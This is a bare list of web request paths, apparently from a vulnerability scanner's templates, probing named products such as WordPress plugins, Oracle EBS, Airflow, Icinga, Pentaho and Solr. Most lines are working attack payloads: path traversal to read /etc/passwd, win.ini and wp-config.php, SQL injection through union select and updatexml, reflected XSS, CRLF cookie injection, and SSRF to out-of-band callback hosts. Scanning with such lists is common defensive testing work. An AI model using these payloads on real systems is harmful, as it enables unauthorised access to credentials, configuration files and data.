/live_mfg.html
/api/users/search_authors
/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;
/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/proxy?url=http://{{interactsh-url}}
/OA_HTML/ibeCAcpSSOReg.jsp
/OA_HTML/ibeCRgpPrimaryCreate.jsp
/OA_HTML/ibeCRgpIndividualUser.jsp
/OA_HTML/ibeCRgpPartnerPriCreate.jsp
/users/sign_in
/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}
/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command
/code?dag_id=example_passing_params_via_test_command
/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd
/cors_proxy/https://oast.me/
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/module/api.php?mobile/webNasIPS
/download/C%3a%2fwindows%2fsystem.ini
/wp/wp-content/uploads/wpjobboard/
/wp-content/uploads/wpjobboard/
/index.php?s=example
/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1
/wp-content/dup-installer/main.installer.php?is_daws=1
/config/list
/index/download/index?name=index.php&url=../../application/database.php
/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
/wp-content/plugins/simple-ajax-chat/sac-export.csv
/js/zimbraMail/share/model/ZmSettings.js
/category_view.php
/folder_view.php
/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green
/modules/blockwishlist/config.xml
/resources//../WEB-INF/web.xml
/test.txt
/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd
/live_mfg.shtml
/cgi-bin/ExportAllSettings.sh
/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5(
/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5(
/admin/requests/take_action.php?id=6
/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+
/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+
/cms/admin/group/all
/?doAs=`{{url_encode(
/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd
/api/moduleInformation
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/
/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22
/../../../../../../../../etc/passwd
/components/statestore
/overview
/controlplane
/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd
/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
/getCorsFile?urlPath={{base64(
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
/pentaho/Login
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js

/cgi-bin/ExportLogs.sh
/../../../../../../../../../../../../windows/iis.log
/wp-json/download-monitor/v1/user_data
/ExportReportingManager.aspx
/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}
